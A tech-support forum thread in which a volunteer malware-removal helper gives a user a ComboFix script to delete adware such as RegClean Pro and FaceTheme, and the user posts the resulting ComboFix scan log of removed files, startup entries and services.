Jump to content

Welcome to Geeks to Go - Register now for FREE

Need help with your computer or device? Want to learn new tech skills? You're in the right place!
Geeks to Go is a friendly community of tech experts who can solve any problem you have. Just create a free account and post your question. Our volunteers will reply quickly and guide you through the steps. Don't let tech troubles stop you. Join Geeks to Go now and get the support you need!

How it Works Create Account
Photo

Unbootable computer


  • Please log in to reply

#46
michaelg9

michaelg9

    Trusted Helper

  • Malware Removal
  • 2,949 posts
Hello,
It's recommended that you uninstall all the Java ones as they're outdated and vulnerable, and install the newer version I indicated above them

The corrupt files that can't be replaced are nothing serious :)

1. Close any open browsers.

2. Close/disable all anti virus and anti malware programs so they do not interfere with the running of ComboFix.

3. Open notepad and copy/paste the text in the quotebox below into it:

KillAll::

File::
c:\windows\system32\roboot.exe
c:\windows\Tasks\RegClean Pro_DEFAULT.job
c:\windows\Tasks\RegClean Pro_UPDATES.job
c:\windows\TEMP\TMP0000007C8CF93F66D2BD0D6F

Folder::
c:\program files\Object
c:\program files\RegClean Pro
c:\program files\TeamViewer\Version5

DDS::
uStart Page = hxxp://www.ask.com/

Driver::
TeamViewer5

RegLockDel::
[HKEY_USERS\S-1-5-21-1853308285-865056411-922338472-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{DA3DD5C5-2F6F-E749-D4A2-0D91BDF20D27}*]

Rootkit::
c:\windows\TEMP\TMP0000007C8CF93F66D2BD0D6F


Save this as CFScript.txt, in the same location as ComboFix.exe


Posted Image

Refering to the picture above, drag CFScript into ComboFix.exe

When finished, it shall produce a log for you at C:\ComboFix.txt which I will require in your next reply.



Next:

Click Start, All Programs, Accessories then right click on Command Prompt and Run as Administrator. Then type (with an Enter after each line).

sigverif

Press Start in the new window. This will check your drivers. If you just get a few when it finishes tell me what they are. If you get a lot just look for those with newish dates (since about the time the problem started.)


Next:

Open up Internet Explorer.
Click Tools > Manage Addons
Posted Image
Check to see if you find any addon named FaceTheme.
If you do, remove it. If you can't remove it, then disable it
Tell me if you find it or not.

Do the same with Chrome

Next:

Tell me if the ads are still there
Also tell me how's your computer working and if there are any other problems.
Is the booting of the computer slow?
  • 0

Advertisements


#47
Bismillah

Bismillah

    Member

  • Topic Starter
  • Member
  • PipPipPip
  • 514 posts
No themeface


ComboFix 11-08-18.01 - LENOVO 18/08/2011 23:28:07.6.2 - x86
Microsoft® Windows Vista™ Business 6.0.6002.2.1252.44.1033.18.1943.705 [GMT 1:00]
Running from: c:\users\LENOVO\Desktop\ComboFix.exe
Command switches used :: c:\users\LENOVO\Desktop\CFScript.txt
AV: avast! Antivirus *Disabled/Updated* {2B2D1395-420B-D5C9-657E-930FE358FC3C}
SP: avast! Antivirus *Disabled/Updated* {904CF271-6431-DA47-5FCE-A87D98DFB681}
SP: Windows Defender *Enabled/Updated* {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
.
FILE ::
"c:\windows\system32\roboot.exe"
"c:\windows\Tasks\RegClean Pro_DEFAULT.job"
"c:\windows\Tasks\RegClean Pro_UPDATES.job"
"c:\windows\TEMP\TMP0000007C8CF93F66D2BD0D6F"
.
.
((((((((((((((((((((((((((((((((((((((( Other Deletions )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
c:\program files\RegClean Pro
c:\program files\RegClean Pro\Chinese_rcp.ini
c:\program files\RegClean Pro\CleanSchedule.exe
c:\program files\RegClean Pro\Danish_rcp.ini
c:\program files\RegClean Pro\Dutch_rcp.ini
c:\program files\RegClean Pro\eng_rcp.ini
c:\program files\RegClean Pro\Finnish_rcp_fi.ini
c:\program files\RegClean Pro\French_rcp.ini
c:\program files\RegClean Pro\German_rcp.ini
c:\program files\RegClean Pro\greek_rcp_el.ini
c:\program files\RegClean Pro\install_left_image.bmp
c:\program files\RegClean Pro\isxdl.dll
c:\program files\RegClean Pro\Italian_rcp.ini
c:\program files\RegClean Pro\Japanese_rcp.ini
c:\program files\RegClean Pro\korean_rcp_ko.ini
c:\program files\RegClean Pro\Norwegian_rcp.ini
c:\program files\RegClean Pro\polish_rcp_pl.ini
c:\program files\RegClean Pro\portugese_rcp_pt.ini
c:\program files\RegClean Pro\Portuguese_rcp.ini
c:\program files\RegClean Pro\RCPUninstall.exe
c:\program files\RegClean Pro\RegCleanPro.dll
c:\program files\RegClean Pro\RegCleanPro.exe
c:\program files\RegClean Pro\russian_rcp_ru.ini
c:\program files\RegClean Pro\Spanish_rcp.ini
c:\program files\RegClean Pro\Swedish_rcp.ini
c:\program files\RegClean Pro\TraditionalCn_rcp_zh-tw.ini
c:\program files\RegClean Pro\turkish_rcp_tr.ini
c:\program files\RegClean Pro\unins000.dat
c:\program files\RegClean Pro\unins000.exe
c:\program files\RegClean Pro\unins000.msg
c:\program files\RegClean Pro\xmllite.dll
c:\program files\TeamViewer\Version5
c:\program files\TeamViewer\Version5\CopyRights.txt
c:\program files\TeamViewer\Version5\install.exe
c:\program files\TeamViewer\Version5\install64.exe
c:\program files\TeamViewer\Version5\Licence.txt
c:\program files\TeamViewer\Version5\Lizenz_TeamViewer_EN.txt
c:\program files\TeamViewer\Version5\TeamViewer.exe
c:\program files\TeamViewer\Version5\TeamViewer_Desktop.exe
c:\program files\TeamViewer\Version5\TeamViewer_Resource_ar.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_cs.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_da.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_de.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_en.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_es.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_fi.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_fr.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_it.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_ja.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_ko.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_nl.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_no.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_pl.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_pt.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_ru.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_sv.dll
c:\program files\TeamViewer\Version5\TeamViewer_Resource_tr.dll
c:\program files\TeamViewer\Version5\TeamViewer_Service.exe
c:\program files\TeamViewer\Version5\TeamViewer5_Logfile.log
c:\program files\TeamViewer\Version5\TV.dll
c:\program files\TeamViewer\Version5\tvinfo.ini
c:\program files\TeamViewer\Version5\UNICOWS.DLL
c:\program files\TeamViewer\Version5\uninstall.exe
c:\program files\TeamViewer\Version5\w2k\TeamViewerVPN.inf
c:\program files\TeamViewer\Version5\w2k\teamviewervpn.sys
c:\program files\TeamViewer\Version5\x64\teamviewervpn.cat
c:\program files\TeamViewer\Version5\x64\TeamViewerVPN.inf
c:\program files\TeamViewer\Version5\x64\teamviewervpn.sys
c:\program files\TeamViewer\Version5\x86\teamviewervpn.cat
c:\program files\TeamViewer\Version5\x86\TeamViewerVPN.inf
c:\program files\TeamViewer\Version5\x86\teamviewervpn.sys
.
.
((((((((((((((((((((((((((((((((((((((( Drivers/Services )))))))))))))))))))))))))))))))))))))))))))))))))
.
.
-------\Legacy_TEAMVIEWER5
-------\Service_TeamViewer5
.
.
((((((((((((((((((((((((( Files Created from 2011-07-18 to 2011-08-18 )))))))))))))))))))))))))))))))
.
.
2011-08-18 22:42 . 2011-08-18 22:47 -------- d-----w- c:\users\LENOVO\AppData\Local\temp
2011-08-18 22:42 . 2011-08-18 22:42 -------- d-----w- c:\users\TEMP\AppData\Local\temp
2011-08-18 22:42 . 2011-08-18 22:42 -------- d-----w- c:\users\Public\AppData\Local\temp
2011-08-18 22:42 . 2011-08-18 22:42 -------- d-----w- c:\users\Default\AppData\Local\temp
2011-08-18 13:42 . 2011-08-18 13:42 -------- d-----w- c:\program files\Speccy
2011-08-18 12:22 . 2011-08-18 12:22 -------- d-----w- C:\_OTL
2011-08-17 10:31 . 2011-08-12 02:44 7152464 ----a-w- c:\programdata\Microsoft\Windows Defender\Definition Updates\{5AF3A294-2491-4E1D-8555-0F43304203B9}\mpengine.dll
2011-08-16 20:51 . 2011-08-16 20:51 -------- d-----w- c:\users\LENOVO\AppData\Roaming\Systweak
2011-08-16 20:50 . 2011-07-07 12:26 17280 ----a-w- c:\windows\system32\roboot.exe
2011-08-15 21:48 . 2011-08-15 21:48 -------- d-----w- c:\users\LENOVO\AppData\Roaming\JGsoft
2011-08-15 21:47 . 2011-08-15 21:47 -------- d-----w- c:\program files\JGsoft
2011-08-15 21:47 . 2011-05-16 02:33 67312 ----a-w- c:\windows\UnDeployV.exe
2011-08-10 20:00 . 2011-06-17 16:03 375808 ----a-w- c:\windows\system32\winsrv.dll
2011-08-10 20:00 . 2011-07-06 15:31 214016 ----a-w- c:\windows\system32\drivers\mrxsmb10.sys
2011-08-10 20:00 . 2011-06-06 10:59 2409784 ----a-w- c:\program files\Windows Mail\OESpamFilter.dat
2011-08-08 19:23 . 2011-08-18 11:48 -------- d-----w- c:\users\LENOVO\AppData\Roaming\.minecraft
2011-07-27 17:16 . 2011-06-02 13:34 2043392 ----a-w- c:\windows\system32\win32k.sys
2011-07-27 17:16 . 2011-04-20 15:50 49152 ----a-w- c:\windows\system32\csrsrv.dll
.
.
.
(((((((((((((((((((((((((((((((((((((((( Find3M Report ))))))))))))))))))))))))))))))))))))))))))))))))))))
.
2011-07-06 18:52 . 2010-09-02 00:15 41272 ----a-w- c:\windows\system32\drivers\mbamswissarmy.sys
2011-07-06 18:52 . 2010-09-02 00:15 22712 ----a-w- c:\windows\system32\drivers\mbam.sys
2011-07-04 11:43 . 2010-08-25 16:06 40112 ----a-w- c:\windows\avastSS.scr
2011-07-04 11:43 . 2010-08-25 16:06 199304 ----a-w- c:\windows\system32\aswBoot.exe
2011-07-04 11:36 . 2011-03-01 21:39 441176 ----a-w- c:\windows\system32\drivers\aswSnx.sys
2011-07-04 11:36 . 2010-08-25 16:07 309848 ----a-w- c:\windows\system32\drivers\aswSP.sys
2011-07-04 11:35 . 2010-08-25 16:07 43608 ----a-w- c:\windows\system32\drivers\aswTdi.sys
2011-07-04 11:32 . 2010-08-25 16:07 25432 ----a-w- c:\windows\system32\drivers\aswRdr.sys
2011-07-04 11:32 . 2010-08-25 16:07 54104 ----a-w- c:\windows\system32\drivers\aswMonFlt.sys
2011-07-04 11:32 . 2010-08-25 16:07 19544 ----a-w- c:\windows\system32\drivers\aswFsBlk.sys
2011-06-18 17:54 . 2011-06-18 17:54 404640 ----a-w- c:\windows\system32\FlashPlayerCPLApp.cpl
2011-06-17 13:45 . 2011-05-08 19:28 187328 ----a-w- c:\programdata\Microsoft\VCSExpress\9.0\1033\ResourceCache.dll
2011-06-17 13:40 . 2011-05-08 19:27 416 ----a-w- c:\programdata\Microsoft\MSDN\9.0\1033\ResourceCache.dll
2011-06-15 11:07 . 2011-01-19 00:59 188128 ----a-w- c:\programdata\Microsoft\VCSExpress\10.0\1033\ResourceCache.dll
2011-05-24 18:14 . 2010-08-25 16:45 222080 ------w- c:\windows\system32\MpSigStub.exe
.
.
((((((((((((((((((((((((((((((((((((( Reg Loading Points ))))))))))))))))))))))))))))))))))))))))))))))))))
.
.
*Note* empty entries & legit default entries are not shown
REGEDIT4
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\00avast]
@="{472083B0-C522-11CF-8763-00608CC02F24}"
[HKEY_CLASSES_ROOT\CLSID\{472083B0-C522-11CF-8763-00608CC02F24}]
2011-07-04 11:43 122512 ----a-w- c:\program files\Alwil Software\Avast5\ashShell.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\1TortoiseNormal]
@="{C5994560-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994560-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\2TortoiseModified]
@="{C5994561-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994561-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\3TortoiseConflict]
@="{C5994562-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994562-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\4TortoiseLocked]
@="{C5994563-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994563-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\5TortoiseReadOnly]
@="{C5994564-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994564-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\6TortoiseDeleted]
@="{C5994565-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994565-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\7TortoiseAdded]
@="{C5994566-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994566-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\8TortoiseIgnored]
@="{C5994567-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994567-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\explorer\shelliconoverlayidentifiers\9TortoiseUnversioned]
@="{C5994568-53D9-4125-87C9-F193FC689CB2}"
[HKEY_CLASSES_ROOT\CLSID\{C5994568-53D9-4125-87C9-F193FC689CB2}]
2010-03-21 07:55 87304 ----a-w- c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
.
[HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"msnmsgr"="c:\program files\Windows Live\Messenger\msnmsgr.exe" [2010-04-16 3872080]
.
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run]
"FingerPrintSoftware"="c:\program files\Lenovo Fingerprint Software\fpapp.exe \s" [X]
"EZEJMNAP"="c:\progra~1\ThinkPad\UTILIT~1\EzEjMnAp.Exe" [2008-10-07 256576]
"TPFNF7"="c:\program files\Lenovo\NPDIRECT\TPFNF7SP.exe" [2009-04-26 61728]
"TpShocks"="TpShocks.exe" [2009-02-03 181536]
"SynTPEnh"="c:\program files\Synaptics\SynTP\SynTPEnh.exe" [2010-04-23 1725736]
"Persistence"="c:\windows\system32\igfxpers.exe" [2008-06-12 145944]
"StartCCC"="c:\program files\ATI Technologies\ATI.ACE\Core-Static\CLIStart.exe" [2008-01-21 61440]
"LPManager"="c:\progra~1\THINKV~1\PrdCtr\LPMGR.exe" [2009-01-28 185688]
"LPMailChecker"="c:\progra~1\THINKV~1\PrdCtr\LPMLCHK.exe" [2009-01-28 124248]
"Message Center Plus"="c:\program files\LENOVO\Message Center Plus\MCPLaunch.exe" [2009-04-22 49976]
"PWMTRV"="c:\progra~1\ThinkPad\UTILIT~1\PWMTR32V.DLL" [2009-04-15 660768]
"CreateLMBCShortCut"="c:\program files\Lenovo\Mobile Broadband Connect\UserShortcutCreator.exe" [2009-04-13 40960]
"TVT Scheduler Proxy"="c:\program files\Common Files\Lenovo\Scheduler\scheduler_proxy.exe" [2008-05-24 487424]
"ACTray"="c:\program files\ThinkPad\ConnectUtilities\ACTray.exe" [2009-12-10 435560]
"ACWlIcon"="c:\program files\ThinkPad\ConnectUtilities\ACWlIcon.exe" [2009-12-10 181608]
"cssauth"="c:\program files\Lenovo\Client Security Solution\cssauth.exe" [2009-03-05 3093816]
"HotKeysCmds"="c:\windows\system32\hkcmd.exe" [2008-06-12 170520]
"LENOVO.TPFNF6R"="c:\program files\Lenovo\HOTKEY\TPFNF6R.exe" [2009-04-14 15136]
"AppleSyncNotifier"="c:\program files\Common Files\Apple\Mobile Device Support\AppleSyncNotifier.exe" [2011-04-20 58656]
"iTunesHelper"="c:\program files\iTunes2\iTunesHelper.exe" [2011-06-07 421160]
"TkBellExe"="c:\program files\Real\RealPlayer\update\realsched.exe" [2011-05-02 273544]
"RIMBBLaunchAgent.exe"="c:\program files\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe" [2011-02-18 79192]
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows\currentversion\policies\system]
"EnableUIADesktopToggle"= 0 (0x0)
"DisableCAD"= 1 (0x1)
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ShortKeys 2.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\ShortKeys 2.lnk
backup=c:\windows\pss\ShortKeys 2.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKLM\~\startupfolder\C:^ProgramData^Microsoft^Windows^Start Menu^Programs^Startup^ShortKeys 3.lnk]
path=c:\programdata\Microsoft\Windows\Start Menu\Programs\Startup\ShortKeys 3.lnk
backup=c:\windows\pss\ShortKeys 3.lnk.CommonStartup
backupExtension=.CommonStartup
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\iTunesHelper]
2011-06-07 16:51 421160 ----a-w- c:\program files\iTunes2\iTunesHelper.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\QuickTime Task]
2010-11-29 16:38 421888 ----a-w- c:\program files\QuickTime\QTTask.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\RIMBBLaunchAgent.exe]
2011-02-18 10:47 79192 ----a-w- c:\program files\Common Files\Research In Motion\USB Drivers\RIMBBLaunchAgent.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\Steam]
2011-06-15 19:03 1242448 ----a-w- c:\program files\Steam\Steam.exe
.
[HKEY_LOCAL_MACHINE\software\microsoft\shared tools\msconfig\startupreg\TkBellExe]
2011-05-02 00:01 273544 ----a-w- c:\program files\Real\RealPlayer\Update\realsched.exe
.
R1 tvtumon;tvtumon;c:\windows\system32\DRIVERS\tvtumon.sys [2008-07-11 48192]
R2 clr_optimization_v4.0.30319_32;Microsoft .NET Framework NGEN v4.0.30319_X86;c:\windows\Microsoft.NET\Framework\v4.0.30319\mscorsvw.exe [2010-03-18 130384]
R2 LENOVO.MICMUTE;Lenovo Microphone Mute;c:\program files\LENOVO\HOTKEY\MICMUTE.exe [2009-03-30 45424]
R3 ADMonitor;AD Monitor;c:\windows\system32\ADMonitor.exe [2008-10-27 106496]
R3 MUXP;My WiFi PAN Mux-IM Protocol Driver;c:\windows\system32\DRIVERS\mux.sys [2009-02-09 29232]
R3 MyWiFiDHCPDNS;Wireless PAN DHCP Server;c:\program files\Intel\WiFi\bin\PanDhcpDns.exe [2009-02-11 204800]
R3 npggsvc;nProtect GameGuard Service;c:\windows\system32\GameMon.des [2010-10-21 4208208]
R3 s115bus;Sony Ericsson Device 115 driver (WDM);c:\windows\system32\DRIVERS\s115bus.sys [2007-04-23 83208]
R3 s115mdfl;Sony Ericsson Device 115 USB WMC Modem Filter;c:\windows\system32\DRIVERS\s115mdfl.sys [2007-04-23 15112]
R3 s115mdm;Sony Ericsson Device 115 USB WMC Modem Driver;c:\windows\system32\DRIVERS\s115mdm.sys [2007-04-23 108680]
R3 s115mgmt;Sony Ericsson Device 115 USB WMC Device Management Drivers (WDM);c:\windows\system32\DRIVERS\s115mgmt.sys [2007-04-23 100488]
R3 s115obex;Sony Ericsson Device 115 USB WMC OBEX Interface;c:\windows\system32\DRIVERS\s115obex.sys [2007-04-23 98568]
R3 WPFFontCache_v0400;Windows Presentation Foundation Font Cache 4.0.0.0;c:\windows\Microsoft.NET\Framework\v4.0.30319\WPF\WPFFontCache_v0400.exe [2010-03-18 753504]
R4 Akamai;Akamai NetSession Interface;c:\windows\System32\svchost.exe [2008-01-21 21504]
R4 RoxMediaDB10;RoxMediaDB10;c:\program files\Common Files\Roxio Shared\10.0\SharedCOM\RoxMediaDB10.exe [2008-04-25 1120752]
R4 TeamViewer6;TeamViewer 6;c:\program files\TeamViewer\Version6\TeamViewer_Service.exe [2011-01-27 2253688]
R4 TVT_UpdateMonitor;TVT Windows Update Monitor;c:\program files\Lenovo\Rescue and Recovery\UpdateMonitor.exe [2008-10-09 360448]
S0 TPDIGIMN;TPDIGIMN;c:\windows\System32\DRIVERS\ApsHM86.sys [2009-01-29 20520]
S1 aswSnx;aswSnx; [x]
S1 aswSP;aswSP; [x]
S1 lenovo.smi;Lenovo System Interface Driver;c:\windows\system32\DRIVERS\smiif32.sys [2008-05-12 13480]
S2 aswFsBlk;aswFsBlk; [x]
S2 aswMonFlt;aswMonFlt;c:\windows\system32\drivers\aswMonFlt.sys [2011-07-04 54104]
S2 ATService;AuthenTec Fingerprint Service;c:\windows\system32\AtService.exe [2008-10-27 1676536]
S2 DDNIOEMService;DDNIOEMService;c:\program files\DDNI\SBITS\DDNIOEMService.exe [2007-09-28 162280]
S2 dtsvc;Data Transfer Service;c:\windows\system32\DTS.exe [2008-10-27 98304]
S2 FirebirdGuardianDefaultInstance;Firebird Guardian - DefaultInstance;c:\program files\Firebird\Firebird_2_5\bin\fbguard.exe [2010-09-17 98304]
S2 Power Manager DBC Service;Power Manager DBC Service;c:\program files\ThinkPad\Utilities\PWMDBSVC.EXE [2009-04-15 66848]
S2 TPHKSVC;On Screen Display;c:\program files\LENOVO\HOTKEY\TPHKSVC.exe [2009-04-02 62320]
S2 TVT Backup Protection Service;TVT Backup Protection Service;c:\program files\Lenovo\Rescue and Recovery\rrpservice.exe [2008-05-24 520192]
S3 amdkmdag;amdkmdag;c:\windows\system32\DRIVERS\atikmdag.sys [2008-09-19 3881472]
S3 amdkmdap;amdkmdap;c:\windows\system32\DRIVERS\atikmpag.sys [2008-09-19 54784]
S3 ATSwpWDF;AuthenTec TruePrint USB WDF Driver;c:\windows\system32\Drivers\ATSwpWDF.sys [2008-10-27 482176]
S3 e1yexpress;Intel® Gigabit Network Connections Driver;c:\windows\system32\DRIVERS\e1y6032.sys [2009-08-14 220152]
S3 FirebirdServerDefaultInstance;Firebird Server - DefaultInstance;c:\program files\Firebird\Firebird_2_5\bin\fbserver.exe [2010-09-17 3735552]
S3 intelkmd;intelkmd;c:\windows\system32\DRIVERS\igdkmd32.sys [2008-06-12 2381312]
S3 ManyCam;ManyCam Virtual Webcam, WDM Video Capture Driver;c:\windows\system32\DRIVERS\ManyCam.sys [2008-01-14 21632]
S3 MUXMP;My WiFi PAN MUX-IM Virtual Miniport Driver;c:\windows\system32\DRIVERS\mux.sys [2009-02-09 29232]
S3 NETw5v32;Intel® Wireless WiFi Link Adapter Driver for Windows Vista 32 Bit ;c:\windows\system32\DRIVERS\NETw5v32.sys [2009-02-09 3715072]
S3 TVTI2C;Lenovo SM bus driver;c:\windows\system32\DRIVERS\Tvti2c.sys [2008-02-22 37312]
.
.
[HKEY_LOCAL_MACHINE\software\microsoft\windows nt\currentversion\svchost]
LocalServiceNoNetwork REG_MULTI_SZ PLA DPS BFE mpssvc
Akamai REG_MULTI_SZ Akamai
LocalServiceAndNoImpersonation REG_MULTI_SZ FontCache
.
Contents of the 'Scheduled Tasks' folder
.
2011-05-20 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1853308285-865056411-922338472-1000Core.job
- c:\users\LENOVO\AppData\Local\Google\Update\GoogleUpdate.exe [2010-08-26 17:30]
.
2011-05-20 c:\windows\Tasks\GoogleUpdateTaskUserS-1-5-21-1853308285-865056411-922338472-1000UA.job
- c:\users\LENOVO\AppData\Local\Google\Update\GoogleUpdate.exe [2010-08-26 17:30]
.
2010-08-05 c:\windows\Tasks\PCDoctorBackgroundMonitorTask.job
- c:\program files\PCDR5\pcdr5cuiw32.exe [2009-02-20 20:57]
.
.
------- Supplementary Scan -------
.
uSearchURL,(Default) = hxxp://g.msn.co.uk/0SEENGB/SAOS01?FORM=TOOLBR
IE: E&xport to Microsoft Excel - c:\progra~1\MI1933~1\Office12\EXCEL.EXE/3000
IE: Save video on Savevid.com - c:\program files\Savevid\redirect.htm
TCP: DhcpNameServer = 194.168.4.100 194.168.8.100
DPF: {DAF7E6E6-D53A-439A-B28D-12271406B8A9} - hxxp://mobileapps.blackberry.com/devicesoftware/AxLoader.cab
FF - ProfilePath - c:\users\LENOVO\AppData\Roaming\Mozilla\Firefox\Profiles\xqbyuseu.default\
FF - Ext: Default: {972ce4c6-7e08-4474-a285-3208198ce6fd} - c:\program files\Mozilla Firefox\extensions\{972ce4c6-7e08-4474-a285-3208198ce6fd}
FF - Ext: Java Console: {CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA} - c:\program files\Mozilla Firefox\extensions\{CAFEEFAC-0016-0000-0024-ABCDEFFEDCBA}
FF - Ext: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - c:\windows\Microsoft.NET\Framework\v3.5\Windows Presentation Foundation\DotNetAssistantExtension
FF - Ext: avast! WebRep: [email protected] - c:\program files\Alwil Software\Avast5\WebRep\FF
FF - Ext: Microsoft .NET Framework Assistant: {20a82645-c095-46ed-80e3-08825760534b} - %profile%\extensions\{20a82645-c095-46ed-80e3-08825760534b}
.
- - - - ORPHANS REMOVED - - - -
.
AddRemove-facetheme - c:\program files\Object\facetheme_uninstall.exe
AddRemove-RegClean Pro_is1 - c:\program files\RegClean Pro\unins000.exe
AddRemove-TeamViewer 5 - c:\program files\TeamViewer\Version5\uninstall.exe
.
.
.
**************************************************************************
scanning hidden processes ...
.
scanning hidden autostart entries ...
.
scanning hidden files ...
.
scan completed successfully
hidden files:
.
**************************************************************************
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Services\npggsvc]
"ImagePath"="c:\windows\system32\GameMon.des -service"
.
--------------------- LOCKED REGISTRY KEYS ---------------------
.
[HKEY_USERS\S-1-5-21-1853308285-865056411-922338472-1000\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Approved\{DA3DD5C5-2F6F-E749-D4A2-0D91BDF20D27}*]
"hahipkcgcajjaeco"=hex:6a,61,66,64,6b,64,61,61,68,64,63,70,68,6f,62,69,6b,6d,
68,68,00,00
"iafbhlgohffmfmhbmf"=hex:63,61,63,65,65,63,00,7f
"iabjjmomdcemelfdgo"=hex:6a,61,66,64,6b,64,61,61,68,64,63,70,68,6f,62,69,6b,6d,
68,68,00,00
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0000\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0001\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0002\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
[HKEY_LOCAL_MACHINE\system\ControlSet010\Control\Class\{4D36E96D-E325-11CE-BFC1-08002BE10318}\0003\AllUserSettings]
@Denied: (A) (Users)
@Denied: (A) (Everyone)
@Allowed: (B 1 2 3 4 5) (S-1-5-20)
"BlindDial"=dword:00000000
.
--------------------- DLLs Loaded Under Running Processes ---------------------
.
- - - - - - - > 'Explorer.exe'(1672)
c:\program files\Common Files\TortoiseOverlays\TortoiseOverlays.dll
c:\program files\TortoiseSVN\bin\TortoiseStub.dll
c:\program files\TortoiseSVN\bin\TortoiseSVN.dll
c:\program files\TortoiseSVN\bin\intl3_tsvn.dll
c:\program files\Lenovo\Drag-to-Disc\Shellex.dll
c:\windows\system32\DLAAPI_W.DLL
c:\program files\Lenovo\Drag-to-Disc\ShellRes.dll
.
------------------------ Other Running Processes ------------------------
.
